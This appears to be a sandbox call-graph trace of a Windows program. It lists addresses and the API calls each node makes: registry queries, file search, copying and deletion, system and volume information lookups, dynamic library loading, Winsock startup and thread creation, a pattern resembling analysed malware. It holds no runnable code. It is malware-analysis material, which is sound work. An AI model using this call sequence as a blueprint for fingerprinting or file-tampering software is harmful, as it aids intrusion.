7ff76a905753 44419->44422 44420->44435 44424 7ff76a905786 RegQueryValueExA 44421->44424 44425 7ff76a90566d 44421->44425 44423 7ff76a9099e2 6 API calls 44422->44423 44423->44435 44437 7ff76a9057b4 44424->44437 44438 7ff76a905807 RegCloseKey 44424->44438 44426 7ff76a9099e2 6 API calls 44425->44426 44426->44436 44427 7ff76a905a89 44430 7ff76a9099e2 6 API calls 44427->44430 44429 7ff76a905aac 44432 7ff76a905929 44430->44432 44431 7ff76a9058e6 44431->44429 44433 7ff76a9099e2 6 API calls 44431->44433 44432->44330 44433->44432 44434 7ff76a9099e2 6 API calls 44434->44437 44435->44427 44435->44431 44436->44414 44436->44435 44437->44434 44437->44438 44438->44435 44440 7ff76a908267 44439->44440 44441 7ff76a90827d strlen 44439->44441 44440->44441 44442 7ff76a90826c strlen 44440->44442 44492 7ff76a9043a9 44441->44492 44442->44441 44445 7ff76a908307 strlen 44446 7ff76a9043a9 8 API calls 44445->44446 44448 7ff76a9082a5 44446->44448 44447 7ff76a908348 44522 7ff76a901cd8 FindClose 44447->44522 44448->44445 44448->44447 44450 7ff76a908334 strlen 44448->44450 44451 7ff76a9082b6 44448->44451 44498 7ff76a901cf3 44448->44498 44450->44448 44451->44353 44452 7ff76a9079c0 44451->44452 44453 7ff76a907a62 44452->44453 44454 7ff76a9079e2 44452->44454 44457 7ff76a9099e2 6 API calls 44453->44457 44455 7ff76a907a92 44454->44455 44456 7ff76a9079eb 44454->44456 44459 7ff76a9099e2 6 API calls 44455->44459 44523 7ff76a902515 44456->44523 44465 7ff76a907a16 44457->44465 44459->44465 44462 7ff76a907d0e 44464 7ff76a9099e2 6 API calls 44466 7ff76a907a4c 44464->44466 44465->44462 44465->44464 44466->44348 44480 7ff76a902ae5 44466->44480 44468 7ff76a907ce8 44468->44465 44469 7ff76a907cf0 44468->44469 44470 7ff76a9099e2 6 API calls 44469->44470 44470->44466 44471 7ff76a907bc5 strlen _mbscpy 44613 7ff76a9044f5 44471->44613 44474 7ff76a907c6f _mbscpy strlen 44475 7ff76a907b32 _mbscat 44474->44475 44478 7ff76a907b2e 44474->44478 44608 7ff76a90380c 44475->44608 44477 7ff76a907ca4 strlen 44477->44475 44478->44468 44478->44471 44478->44474 44478->44475 44478->44477 44479 7ff76a9099e2 6 API calls 44478->44479 44632 7ff76a90227b 44478->44632 44479->44478 44481 7ff76a902afc DeleteFileA 44480->44481 44484 7ff76a902b06 44480->44484 44482 7ff76a902b53 GetLastError 44481->44482 44481->44484 44483 7ff76a9099e2 6 API calls 44482->44483 44483->44484 44485 7ff76a902c82 44484->44485 44487 7ff76a902b32 44484->44487 44486 7ff76a9099e2 6 API calls 44485->44486 44488 7ff76a902ca4 44486->44488 44489 7ff76a9099e2 6 API calls 44487->44489 44491 7ff76a9099e2 6 API calls 44488->44491 44490 7ff76a902b48 44489->44490 44490->44353 44491->44488 44493 7ff76a9043b2 GetFileAttributesA 44492->44493 44494 7ff76a9043c7 44492->44494 44496 7ff76a9043f7 GetLastError 44493->44496 44497 7ff76a9043bd 44493->44497 44495 7ff76a9099e2 6 API calls 44494->44495 44495->44497 44496->44497 44497->44448 44499 7ff76a901d13 44498->44499 44519 7ff76a901d59 44498->44519 44501 7ff76a901db2 44499->44501 44502 7ff76a901d1c 44499->44502 44500 7ff76a9099e2 6 API calls 44521 7ff76a901da3 44500->44521 44503 7ff76a9099e2 6 API calls 44501->44503 44504 7ff76a901d25 44502->44504 44505 7ff76a901dea 44502->44505 44503->44521 44507 7ff76a901e22 FindFirstFileA 44504->44507 44508 7ff76a901d31 FindNextFileA 44504->44508 44506 7ff76a9099e2 6 API calls 44505->44506 44506->44521 44509 7ff76a901d47 _mbscpy 44507->44509 44510 7ff76a901e43 GetLastError 44507->44510 44508->44509 44511 7ff76a901e72 GetLastError 44508->44511 44509->44519 44514 7ff76a901e50 44510->44514 44515 7ff76a901e57 44510->44515 44512 7ff76a901e9b 44511->44512 44511->44514 44517 7ff76a9099e2 6 API calls 44512->44517 44516 7ff76a901e8d FindClose 44514->44516 44514->44519 44520 7ff76a901eb8 44514->44520 44518 7ff76a9099e2 6 API calls 44515->44518 44516->44519 44517->44514 44518->44514 44519->44500 44519->44521 44520->44448 44521->44448 44522->44451 44524 7ff76a9025b5 44523->44524 44525 7ff76a902537 44523->44525 44528 7ff76a9099e2 6 API calls 44524->44528 44526 7ff76a902540 44525->44526 44527 7ff76a9025fa 44525->44527 44531 7ff76a902550 fopen 44526->44531 44532 7ff76a90262d 44526->44532 44530 7ff76a9099e2 6 API calls 44527->44530 44529 7ff76a9025f0 44528->44529 44539 7ff76a90274f 44529->44539 44540 7ff76a902abb 44529->44540 44530->44529 44533 7ff76a902660 _errno 44531->44533 44534 7ff76a90256b fseek 44531->44534 44535 7ff76a9099e2 6 API calls 44532->44535 44536 7ff76a9099e2 6 API calls 44533->44536 44537 7ff76a902586 _errno 44534->44537 44538 7ff76a902778 44534->44538 44535->44529 44541 7ff76a902682 _errno 44536->44541 44542 7ff76a9099e2 6 API calls 44537->44542 44548 7ff76a9027b0 _errno 44538->44548 44549 7ff76a902787 44538->44549 44543 7ff76a9099e2 6 API calls 44539->44543 44552 7ff76a9099e2 6 API calls 44540->44552 44544 7ff76a9026c0 _errno 44541->44544 44545 7ff76a90268b 44541->44545 44546 7ff76a9025a8 _errno 44542->44546 44547 7ff76a902765 44543->44547 44551 7ff76a90270d 44544->44551 44545->44544 44546->44524 44550 7ff76a9026f9 _errno 44546->44550 44547->44465 44578 7ff76a90737b 44547->44578 44553 7ff76a9099e2 6 API calls 44548->44553 44549->44551 44556 7ff76a902838 fseek 44549->44556 44550->44551 44551->44529 44554 7ff76a902712 fclose 44551->44554 44552->44547 44555 7ff76a9027d2 _errno 44553->44555 44554->44529 44557 7ff76a90281f _errno 44555->44557 44558 7ff76a9027db 44555->44558 44559 7ff76a902852 44556->44559 44560 7ff76a90287a _errno 44556->44560 44557->44551 44558->44557 44561 7ff76a902902 GetProcessHeap HeapAlloc 44559->44561 44569 7ff76a902864 44559->44569 44562 7ff76a9099e2 6 API calls 44560->44562 44564 7ff76a90292a 44561->44564 44561->44569 44563 7ff76a90289c _errno 44562->44563 44566 7ff76a9028a5 44563->44566 44567 7ff76a9028e9 _errno 44563->44567 44565 7ff76a9099e2 6 API calls 44564->44565 44565->44569 44566->44567 44567->44551 44568 7ff76a902a05 44570 7ff76a902a10 44568->44570 44572 7ff76a9099e2 6 API calls 44568->44572 44569->44551 44569->44568 44571 7ff76a9029ce fread 44569->44571 44574 7ff76a902945 _errno 44569->44574 44577 7ff76a9029a5 _errno 44569->44577 44570->44551 44573 7ff76a902a1f GetProcessHeap HeapFree 44570->44573 44571->44568 44571->44569 44572->44570 44573->44551 44575 7ff76a9099e2 6 API calls 44574->44575 44576 7ff76a902967 _errno 44575->44576 44576->44569 44576->44577 44577->44569 44579 7ff76a907384 44578->44579 44580 7ff76a9073e8 44578->44580 44582 7ff76a9099e2 6 API calls 44579->44582 44583 7ff76a90738d 44579->44583 44581 7ff76a9099e2 6 API calls 44580->44581 44581->44583 44582->44583 44583->44465 44584 7ff76a904688 44583->44584 44585 7ff76a90469e 44584->44585 44586 7ff76a90470d 44584->44586 44587 7ff76a904740 44585->44587 44588 7ff76a9046a7 44585->44588 44589 7ff76a9099e2 6 API calls 44586->44589 44590 7ff76a9099e2 6 API calls 44587->44590 44591 7ff76a904770 44588->44591 44592 7ff76a9046b0 44588->44592 44607 7ff76a904736 44589->44607 44590->44607 44593 7ff76a9099e2 6 API calls 44591->44593 44594 7ff76a9047a0 44592->44594 44595 7ff76a9046bc ExpandEnvironmentStringsA 44592->44595 44593->44607 44597 7ff76a9099e2 6 API calls 44594->44597 44598 7ff76a9046cd 44595->44598 44599 7ff76a90481b GetLastError 44595->44599 44596 7ff76a904967 44597->44607 44602 7ff76a9048fc 44598->44602 44603 7ff76a9046db 44598->44603 44600 7ff76a9099e2 6 API calls 44599->44600 44600->44607 44601 7ff76a9099e2 6 API calls 44606 7ff76a904703 44601->44606 44604 7ff76a9099e2 6 API calls 44602->44604 44605 7ff76a9099e2 6 API calls 44603->44605 44604->44607 44605->44606 44606->44478 44607->44596 44607->44601 44660 7ff76a9030b1 44608->44660 44614 7ff76a904596 44613->44614 44615 7ff76a90450b 44613->44615 44616 7ff76a9099e2 6 API calls 44614->44616 44617 7ff76a9045c6 44615->44617 44618 7ff76a904514 44615->44618 44627 7ff76a9045bf 44616->44627 44621 7ff76a9099e2 6 API calls 44617->44621 44619 7ff76a9045f6 44618->44619 44620 7ff76a904520 strlen 44618->44620 44622 7ff76a9099e2 6 API calls 44619->44622 44623 7ff76a904532 44620->44623 44620->44627 44621->44627 44622->44627 44633 7ff76a902325 44632->44633 44634 7ff76a90229a 44632->44634 44635 7ff76a9099e2 6 API calls 44633->44635 44636 7ff76a902355 44634->44636 44637 7ff76a9022a3 fopen 44634->44637 44638 7ff76a9022da 44635->44638 44639 7ff76a9099e2 6 API calls 44636->44639 44640 7ff76a9022b4 44637->44640 44641 7ff76a902388 _errno 44637->44641 44652 7ff76a9024da 44638->44652 44653 7ff76a9022fb 44638->44653 44639->44638 44643 7ff76a902416 fwrite 44640->44643 44644 7ff76a9022c8 44640->44644 44642 7ff76a9099e2 6 API calls 44641->44642 44645 7ff76a9023b0 _errno 44642->44645 44647 7ff76a90242e 44643->44647 44648 7ff76a902438 _errno 44643->44648 44644->44638 44646 7ff76a9022d2 fclose 44644->44646 44646->44638 44647->44648 44655 7ff76a9099e2 6 API calls 44652->44655 44661 7ff76a903141 CopyFileA 44660->44661 44665 7ff76a9030d9 44660->44665 44662 7ff76a90316a GetLastError 44661->44662 44661->44665 44664 7ff76a903194 44665->44664 44667 7ff76a903110 44665->44667 44738 7ffe11ec317c InitializeCriticalSectionAndSpinCount 44677->44738 44680 7ffe11ec34c6 44689 7ffe11ec34ca 44680->44689 44807 7ffe11ec2f1e WSAStartup 44680->44807 44684 7ffe11ec3511 44684->44689 44815 7ffe11ec3b21 InitializeCriticalSectionAndSpinCount 44684->44815 44689->44205 44946 7ffe0e16143c InitializeCriticalSectionAndSpinCount 44690->44946 44693 7ffe0e16bdd6 44694 7ffe0e16bdda 44693->44694 45015 7ffe0e162dde WSAStartup 44693->45015 44694->44205 45162 7ffe1150143c InitializeCriticalSectionAndSpinCount 44705->45162 44708 7ffe1150a946 44709 7ffe1150a94a 44708->44709 45231 7ffe11502dde WSAStartup 44708->45231 44709->44205 45352 7ffe0eb4143c InitializeCriticalSectionAndSpinCount 44718->45352 44726 7ffe0eb48456 44734 7ffe0eb4845a 44726->44734 45421 7ffe0eb449bf InitializeCriticalSectionAndSpinCount 44726->45421 44734->44205 44735->44204 44736->44205 44737->44205 44739 7ffe11ec31aa 44738->44739 44740 7ffe11ec32d0 GetLastError 44738->44740 44843 7ffe11ec1e40 GetModuleHandleExA 44739->44843 44741 7ffe11ec2fd2 6 API calls 44740->44741 44746 7ffe11ec32a9 44741->44746 44750 7ffe11ec2fd2 6 API calls 44746->44750 44747 7ffe11ec31e4 strlen 44748 7ffe11ec31fd 44747->44748 44749 7ffe11ec3213 44747->44749 44748->44749 44751 7ffe11ec3202 strlen 44748->44751 44752 7ffe11ec3238 strlen fopen 44749->44752 44753 7ffe11ec3218 strcat strlen 44749->44753 44754 7ffe11ec32c6 44750->44754 44751->44749 44755 7ffe11ec3287 44752->44755 44756 7ffe11ec339d 44752->44756 44753->44752 44754->44680 44762 7ffe11ec8ab4 44754->44762 44758 7ffe11ec2fd2 6 API calls 44755->44758 44757 7ffe11ec2fd2 6 API calls 44756->44757 44757->44746 44759 7ffe11ec32a1 44758->44759 44759->44746 44760 7ffe11ec340d 44759->44760 44761 7ffe11ec2fd2 6 API calls 44760->44761 44761->44754 44763 7ffe11ec8ad6 44762->44763 44764 7ffe11ec8b19 44762->44764 44861 7ffe11ec8720 44763->44861 44765 7ffe11ec2fd2 6 API calls 44764->44765 44770 7ffe11ec3501 44765->44770 44768 7ffe11ec8b49 _errno _strtoui64 _errno 44769 7ffe11ec8b7c _errno 44768->44769 44768->44770 44771 7ffe11ec2fd2 6 API calls 44769->44771 44770->44689 44772 7ffe11ec4430 44770->44772 44771->44770 44903 7ffe11ec2174 44772->44903 44776 7ffe11ec4497 FreeLibrary 44779 7ffe11ec44f7 GetNativeSystemInfo GetWindowsDirectoryA 44776->44779 44799 7ffe11ec44cd 44776->44799 44778 7ffe11ec2fd2 6 API calls 44780 7ffe11ec44e9 44778->44780 44781 7ffe11ec4536 GetLastError 44779->44781 44782 7ffe11ec460e 44779->44782 44780->44680 44784 7ffe11ec2fd2 6 API calls 44781->44784 44785 7ffe11ec2fd2 6 API calls 44782->44785 44784->44799 44787 7ffe11ec462f 44785->44787 44786 7ffe11ec2fd2 6 API calls 44786->44776 44787->44799 44919 7ffe11ec9702 44787->44919 44789 7ffe11ec467b GetVolumeInformationA 44791 7ffe11ec47db 44789->44791 44792 7ffe11ec46de GetLastError 44789->44792 44790 7ffe11ec2fd2 6 API calls 44795 7ffe11ec466b 44790->44795 44794 7ffe11ec2fd2 6 API calls 44791->44794 44793 7ffe11ec2fd2 6 API calls 44792->44793 44793->44795 44796 7ffe11ec47f8 44794->44796 44795->44789 44795->44790 44795->44799 44797 7ffe11ec4821 44796->44797 44798 7ffe11ec480f strlen 44796->44798 44801 7ffe11ec2fd2 6 API calls 44797->44801 44798->44797 44800 7ffe11ec48e3 44798->44800 44799->44778 44800->44797 44802 7ffe11ec48f7 _errno 44800->44802 44801->44780 44808 7ffe11ec2f3a 44807->44808 44809 7ffe11ec2f62 44807->44809 44810 7ffe11ec2fd2 6 API calls 44808->44810 44811 7ffe11ec2fd2 6 API calls 44809->44811 44814 7ffe11ec2f54 44810->44814 44812 7ffe11ec2f7b 44811->44812 44813 7ffe11ec2fd2 6 API calls 44812->44813 44813->44814 44814->44684 44816 7ffe11ec3b46 CreateThread 44815->44816 44817 7ffe11ec3bc4 GetLastError 44815->44817 44818 7ffe11ec3c9c GetLastError 44816->44818 44819 7ffe11ec3b92 44816->44819 44820 7ffe11ec2fd2 6 API calls 44817->44820 44822 7ffe11ec2fd2 6 API calls 44818->44822 44821 7ffe11ec3d95 44819->44821 44823 7ffe11ec3b9f 44819->44823 44820->44823 44824 7ffe11ec2fd2 6 API calls 44821->44824 44822->44823 44825 7ffe11ec2fd2 6 API calls 44823->44825 44826 7ffe11ec351f 44824->44826 44825->44826 44826->44689 44827 7ffe11ec38ae 44826->44827 44828 7ffe11ec38bc EnterCriticalSection 44827->44828 44829 7ffe11ec38d2 44827->44829 44831 7ffe11ec3920 44828->44831 44830 7ffe11ec2fd2 6 API calls 44829->44830 44832 7ffe11ec38fb 44830->44832 44833 7ffe11ec393b 44831->44833 44834 7ffe11ec397e GetProcessHeap HeapAlloc 44831->44834 44837 7ffe11ec2fd2 6 API calls 44832->44837 44836 7ffe11ec3940 LeaveCriticalSection 44833->44836 44835 7ffe11ec39d8 44834->44835 44841 7ffe11ec399d 44834->44841 44838 7ffe11ec2fd2 6 API calls 44835->44838 44836->44832 44839 7ffe11ec3a0c 44836->44839 44840 7ffe11ec3975 44837->44840 44838->44841 44842 7ffe11ec2fd2 6 API calls 44839->44842 44840->44689 44841->44836 44842->44840 44844 7ffe11ec1e68 44843->44844 44845 7ffe11ec1e72 GetLastError 44843->44845 44847 7ffe11ec7dd1 44844->44847 44846 7ffe11ec2fd2 6 API calls 44845->44846 44846->44844 44848 7ffe11ec7e18 44847->44848 44849 7ffe11ec7de2 44847->44849 44852 7ffe11ec2fd2 6 API calls 44848->44852 44850 7ffe11ec7e48 44849->44850 44851 7ffe11ec7de7 44849->44851 44855 7ffe11ec2fd2 6 API calls 44850->44855 44853 7ffe11ec7e78 44851->44853 44854 7ffe11ec7df0 44851->44854 44858 7ffe11ec31da 44852->44858 44856 7ffe11ec2fd2 6 API calls 44853->44856 44860 7ffe11ec7c92 8 API calls 44854->44860 44855->44858 44856->44858 44858->44746 44858->44747 44859 7ffe11ec7df5 44859->44858 44860->44859 44862 7ffe11ec8769 44861->44862 44863 7ffe11ec8731 44861->44863 44865 7ffe11ec2fd2 6 API calls 44862->44865 44869 7ffe11ec8409 44863->44869 44867 7ffe11ec8748 44865->44867 44867->44768 44867->44770 44870 7ffe11ec843c 44869->44870 44871 7ffe11ec8421 44869->44871 44874 7ffe11ec2fd2 6 API calls 44870->44874 44872 7ffe11ec8426 44871->44872 44873 7ffe11ec846f 44871->44873 44876 7ffe11ec842b 44872->44876 44877 7ffe11ec84a2 44872->44877 44875 7ffe11ec2fd2 6 API calls 44873->44875 44880 7ffe11ec8465 44874->44880 44875->44880 44879 7ffe11ec850c 44876->44879 44881 7ffe11ec84e1 strcmp 44876->44881 44878 7ffe11ec2fd2 6 API calls 44877->44878 44878->44880 44879->44880 44882 7ffe11ec8513 44879->44882 44883 7ffe11ec2fd2 6 API calls 44880->44883 44881->44876 44884 7ffe11ec2fd2 6 API calls 44882->44884 44885 7ffe11ec8529 44883->44885 44884->44885 44885->44867 44886 7ffe11ec8590 44885->44886 44887 7ffe11ec85a8 44886->44887 44888 7ffe11ec85c3 44886->44888 44889 7ffe11ec85ad 44887->44889 44890 7ffe11ec85f6 44887->44890 44891 7ffe11ec2fd2 6 API calls 44888->44891 44892 7ffe11ec8629 44889->44892 44899 7ffe11ec85b2 44889->44899 44893 7ffe11ec2fd2 6 API calls 44890->44893 44901 7ffe11ec85ec 44891->44901 44894 7ffe11ec2fd2 6 API calls 44892->44894 44893->44901 44894->44901 44895 7ffe11ec868b 44896 7ffe11ec8694 44895->44896 44895->44901 44898 7ffe11ec2fd2 6 API calls 44896->44898 44897 7ffe11ec8668 strcmp 44897->44899 44900 7ffe11ec86b9 44898->44900 44899->44895 44899->44897 44900->44867 44902 7ffe11ec2fd2 6 API calls 44901->44902 44902->44900 44904 7ffe11ec21ab 44903->44904 44905 7ffe11ec2182 LoadLibraryA 44903->44905 44906 7ffe11ec21ae GetLastError 44904->44906 44905->44906 44907 7ffe11ec2190 44905->44907 44909 7ffe11ec2fd2 6 API calls 44906->44909 44908 7ffe11ec2fd2 6 API calls 44907->44908 44910 7ffe11ec21a9 44908->44910 44909->44910 44910->44799 44911 7ffe11ec20f3 44910->44911 44912 7ffe11ec2141 44911->44912 44913 7ffe11ec2110 GetProcAddress 44911->44913 44914 7ffe11ec2146 GetLastError 44912->44914 44913->44914 44915 7ffe11ec2121 44913->44915 44917 7ffe11ec2fd2 6 API calls 44914->44917 44916 7ffe11ec2fd2 6 API calls 44915->44916 44918 7ffe11ec213f 44916->44918 44917->44918 44918->44776 44918->44786 44920 7ffe11ec972b 44919->44920 44937 7ffe11ec978a 44919->44937 44922 7ffe11ec97ed 44920->44922 44923 7ffe11ec9734 44920->44923 44921 7ffe11ec2fd2 6 API calls 44940 7ffe11ec97e3 44921->44940 44924 7ffe11ec2fd2 6 API calls 44922->44924 44925 7ffe11ec973d 44923->44925 44926 7ffe11ec9820 44923->44926 44924->44940 44928 7ffe11ec9746 RegOpenKeyExA 44925->44928 44929 7ffe11ec9853 44925->44929 44927 7ffe11ec2fd2 6 API calls 44926->44927 44927->44940 44930 7ffe11ec976d 44928->44930 44931 7ffe11ec9886 RegQueryValueExA 44928->44931 44932 7ffe11ec2fd2 6 API calls 44929->44932 44933 7ffe11ec2fd2 6 API calls 44930->44933 44944 7ffe11ec98b4 44931->44944 44945 7ffe11ec9907 RegCloseKey 44931->44945 44932->44940 44933->44937 44934 7ffe11ec9b89 44935 7ffe11ec2fd2 6 API calls 44934->44935 44939 7ffe11ec9a29 44935->44939 44937->44921 44937->44940 44938 7ffe11ec9bac 44939->44795 44940->44934 44941 7ffe11ec99e6 44940->44941 44941->44938 44943 7ffe11ec2fd2 6 API calls 44941->44943 44942 7ffe11ec2fd2 6 API calls 44942->44944 44943->44939 44944->44942 44944->44945 44945->44940 44947 7ffe0e161590 GetLastError 44946->44947 44948 7ffe0e16146a 44946->44948 44949 7ffe0e161292 6 API calls 44947->44949 45059 7ffe0e16cc60 GetModuleHandleExA 44948->45059 44961 7ffe0e161569 44949->44961 44954 7ffe0e1614a4 strlen 44955 7ffe0e1614d3 44954->44955 44956 7ffe0e1614bd 44954->44956 44959 7ffe0e1614f8 strlen fopen 44955->44959 44960 7ffe0e1614d8 strcat strlen 44955->44960 44956->44955 44958 7ffe0e1614c2 strlen 44956->44958 44957 7ffe0e161292 6 API calls 44969 7ffe0e161586 44957->44969 44958->44955 44962 7ffe0e16165d 44959->44962 44963 7ffe0e161547 44959->44963 44960->44959 44961->44957 44965 7ffe0e161292 6 API calls 44962->44965 44964 7ffe0e161292 6 API calls 44963->44964 44966 7ffe0e161561 44964->44966 44965->44961 44966->44961 44967 7ffe0e1616cd 44966->44967 44968 7ffe0e161292 6 API calls 44967->44968 44968->44969 44969->44693 44970 7ffe0e16c974 44969->44970 44971 7ffe0e16c9d9 44970->44971 44972 7ffe0e16c996 44970->44972 44973 7ffe0e161292 6 API calls 44971->44973 45077 7ffe0e16c5e0 44972->45077 44976 7ffe0e16be11 44973->44976 44976->44694 44980 7ffe0e169770 44976->44980 44977 7ffe0e16ca09 _errno _strtoui64 _errno 44977->44976 44978 7ffe0e16ca3c _errno 44977->44978 44979 7ffe0e161292 6 API calls 44978->44979 44979->44976 45119 7ffe0e16cf94 44980->45119 44984 7ffe0e1697d7 FreeLibrary 44987 7ffe0e169837 GetNativeSystemInfo GetWindowsDirectoryA 44984->44987 45008 7ffe0e16980d 44984->45008 44986 7ffe0e161292 6 API calls 44988 7ffe0e169829 44986->44988 44990 7ffe0e16994e 44987->44990 44991 7ffe0e169876 GetLastError 44987->44991 44988->44693 44992 7ffe0e161292 6 API calls 44990->44992 44994 7ffe0e161292 6 API calls 44991->44994 44995 7ffe0e16996f 44992->44995 44993 7ffe0e161292 6 API calls 44993->44984 44994->45008 44995->45008 45135 7ffe0e16b0e2 44995->45135 44997 7ffe0e1699bb GetVolumeInformationA 44999 7ffe0e169a1e GetLastError 44997->44999 45000 7ffe0e169b1b 44997->45000 44998 7ffe0e161292 6 API calls 45004 7ffe0e1699ab 44998->45004 45001 7ffe0e161292 6 API calls 44999->45001 45002 7ffe0e161292 6 API calls 45000->45002 45001->45004 45003 7ffe0e169b38 45002->45003 45005 7ffe0e169b61 45003->45005 45006 7ffe0e169b4f strlen 45003->45006 45004->44997 45004->44998 45004->45008 45009 7ffe0e161292 6 API calls 45005->45009 45006->45005 45007 7ffe0e169c23 45006->45007 45007->45005 45008->44986 45009->44988 45016 7ffe0e162e22 45015->45016 45017 7ffe0e162dfa 45015->45017 45018 7ffe0e161292 6 API calls 45016->45018 45019 7ffe0e161292 6 API calls 45017->45019 45020 7ffe0e162e3b 45018->45020 45021 7ffe0e162e14 45019->45021 45022 7ffe0e161292 6 API calls 45020->45022 45021->44694 45023 7ffe0e165a84 InitializeCriticalSectionAndSpinCount 45021->45023 45022->45021 45024 7ffe0e165ad4 GetLastError 45023->45024 45025 7ffe0e165a9f 45023->45025 45026 7ffe0e161292 6 API calls 45024->45026 45027 7ffe0e161292 6 API calls 45025->45027 45028 7ffe0e165af2 45026->45028 45030 7ffe0e165ac7 45027->45030 45029 7ffe0e161292 6 API calls 45028->45029 45029->45030 45030->44694 45031 7ffe0e161d21 InitializeCriticalSectionAndSpinCount 45030->45031 45032 7ffe0e161dc4 GetLastError 45031->45032 45033 7ffe0e161d46 CreateThread 45031->45033 45035 7ffe0e161292 6 API calls 45032->45035 45034 7ffe0e161e9c GetLastError 45033->45034 45042 7ffe0e161d92 45033->45042 45038 7ffe0e161292 6 API calls 45034->45038 45037 7ffe0e161d9f 45035->45037 45036 7ffe0e161f95 45040 7ffe0e161292 6 API calls 45036->45040 45039 7ffe0e161292 6 API calls 45037->45039 45038->45042 45041 7ffe0e161dbc 45039->45041 45040->45041 45041->44694 45043 7ffe0e161aae 45041->45043 45042->45036 45042->45037 45044 7ffe0e161ad2 45043->45044 45045 7ffe0e161abc EnterCriticalSection 45043->45045 45047 7ffe0e161292 6 API calls 45044->45047 45046 7ffe0e161b20 45045->45046 45049 7ffe0e161b7e GetProcessHeap HeapAlloc 45046->45049 45050 7ffe0e161b3b 45046->45050 45048 7ffe0e161afb 45047->45048 45051 7ffe0e161292 6 API calls 45048->45051 45052 7ffe0e161bd8 45049->45052 45057 7ffe0e161b9d 45049->45057 45053 7ffe0e161b40 LeaveCriticalSection 45050->45053 45055 7ffe0e161b75 45051->45055 45056 7ffe0e161292 6 API calls 45052->45056 45053->45048 45054 7ffe0e161c0c 45053->45054 45058 7ffe0e161292 6 API calls 45054->45058 45055->44694 45056->45057 45057->45053 45058->45055 45060 7ffe0e16cc92 GetLastError 45059->45060 45061 7ffe0e161486 45059->45061 45062 7ffe0e161292 6 API calls 45060->45062 45063 7ffe0e168ff1 45061->45063 45062->45061 45064 7ffe0e169002 45063->45064 45065 7ffe0e169038 45063->45065 45067 7ffe0e169068 45064->45067 45068 7ffe0e169007 45064->45068 45066 7ffe0e161292 6 API calls 45065->45066 45074 7ffe0e16149a 45066->45074 45069 7ffe0e161292 6 API calls 45067->45069 45070 7ffe0e169010 45068->45070 45071 7ffe0e169098 45068->45071 45069->45074 45076 7ffe0e168eb2 8 API calls 45070->45076 45072 7ffe0e161292 6 API calls 45071->45072 45072->45074 45074->44954 45074->44961 45075 7ffe0e169015 45075->45074 45076->45075 45078 7ffe0e16c5f1 45077->45078 45079 7ffe0e16c629 45077->45079 45085 7ffe0e16c2c9 45078->45085 45081 7ffe0e161292 6 API calls 45079->45081 45084 7ffe0e16c608 45081->45084 45084->44976 45084->44977 45086 7ffe0e16c2e1 45085->45086 45087 7ffe0e16c2fc 45085->45087 45088 7ffe0e16c32f 45086->45088 45089 7ffe0e16c2e6 45086->45089 45090 7ffe0e161292 6 API calls 45087->45090 45092 7ffe0e161292 6 API calls 45088->45092 45091 7ffe0e16c362 45089->45091 45093 7ffe0e16c2eb 45089->45093 45098 7ffe0e16c325 45090->45098 45094 7ffe0e161292 6 API calls 45091->45094 45092->45098 45095 7ffe0e16c3cc 45093->45095 45096 7ffe0e16c3a1 strcmp 45093->45096 45094->45098 45097 7ffe0e16c3d3 45095->45097 45095->45098 45096->45093 45099 7ffe0e161292 6 API calls 45097->45099 45100 7ffe0e161292 6 API calls 45098->45100 45101 7ffe0e16c3e9 45099->45101 45100->45101 45101->45084 45102 7ffe0e16c450 45101->45102 45103 7ffe0e16c483 45102->45103 45104 7ffe0e16c468 45102->45104 45107 7ffe0e161292 6 API calls 45103->45107 45105 7ffe0e16c46d 45104->45105 45106 7ffe0e16c4b6 45104->45106 45109 7ffe0e16c4e9 45105->45109 45111 7ffe0e16c472 45105->45111 45108 7ffe0e161292 6 API calls 45106->45108 45116 7ffe0e16c4ac 45107->45116 45108->45116 45110 7ffe0e161292 6 API calls 45109->45110 45110->45116 45112 7ffe0e16c54b 45111->45112 45113 7ffe0e16c528 strcmp 45111->45113 45114 7ffe0e16c554 45112->45114 45112->45116 45113->45111 45115 7ffe0e161292 6 API calls 45114->45115 45117 7ffe0e16c579 45115->45117 45118 7ffe0e161292 6 API calls 45116->45118 45117->45084 45118->45117 45120 7ffe0e16cfa2 LoadLibraryA 45119->45120 45121 7ffe0e16cfcb 45119->45121 45122 7ffe0e16cfb0 45120->45122 45123 7ffe0e16cfce GetLastError 45120->45123 45121->45123 45124 7ffe0e161292 6 API calls 45122->45124 45125 7ffe0e161292 6 API calls 45123->45125 45126 7ffe0e169784 45124->45126 45125->45126 45126->45008 45127 7ffe0e16cf13 45126->45127 45128 7ffe0e16cf30 GetProcAddress 45127->45128 45129 7ffe0e16cf61 45127->45129 45130 7ffe0e16cf41 45128->45130 45131 7ffe0e16cf66 GetLastError 45128->45131 45129->45131 45132 7ffe0e161292 6 API calls 45130->45132 45133 7ffe0e161292 6 API calls 45131->45133 45134 7ffe0e16979f 45132->45134 45133->45134 45134->44984 45134->44993 45136 7ffe0e16b10b 45135->45136 45151 7ffe0e16b16a 45135->45151 45138 7ffe0e16b114 45136->45138 45139 7ffe0e16b1cd 45136->45139 45137 7ffe0e161292 6 API calls 45156 7ffe0e16b1c3 45137->45156 45141 7ffe0e16b200 45138->45141 45142 7ffe0e16b11d 45138->45142 45140 7ffe0e161292 6 API calls 45139->45140 45140->45156 45143 7ffe0e161292 6 API calls 45141->45143 45144 7ffe0e16b233 45142->45144 45145 7ffe0e16b126 RegOpenKeyExA 45142->45145 45143->45156 45148 7ffe0e161292 6 API calls 45144->45148 45146 7ffe0e16b14d 45145->45146 45147 7ffe0e16b266 RegQueryValueExA 45145->45147 45149 7ffe0e161292 6 API calls 45146->45149 45160 7ffe0e16b294 45147->45160 45161 7ffe0e16b2e7 RegCloseKey 45147->45161 45148->45156 45149->45151 45150 7ffe0e16b569 45154 7ffe0e161292 6 API calls 45150->45154 45151->45137 45151->45156 45152 7ffe0e16b58c 45155 7ffe0e16b409 45154->45155 45155->45004 45156->45150 45157 7ffe0e16b3c6 45156->45157 45157->45152 45159 7ffe0e161292 6 API calls 45157->45159 45158 7ffe0e161292 6 API calls 45158->45160 45159->45155 45160->45158 45160->45161 45161->45156 45163 7ffe1150146a 45162->45163 45164 7ffe11501590 GetLastError 45162->45164 45165 7ffe11509cc0 8 API calls 45163->45165 45166 7ffe11501292 6 API calls 45164->45166 45167 7ffe11501486 45165->45167 45168 7ffe11501569 45166->45168 45169 7ffe11506dd1 8 API calls 45167->45169 45174 7ffe11501292 6 API calls 45168->45174 45170 7ffe1150149a 45169->45170 45170->45168 45171 7ffe115014a4 strlen 45170->45171 45172 7ffe115014bd 45171->45172 45173 7ffe115014d3 45171->45173 45172->45173 45175 7ffe115014c2 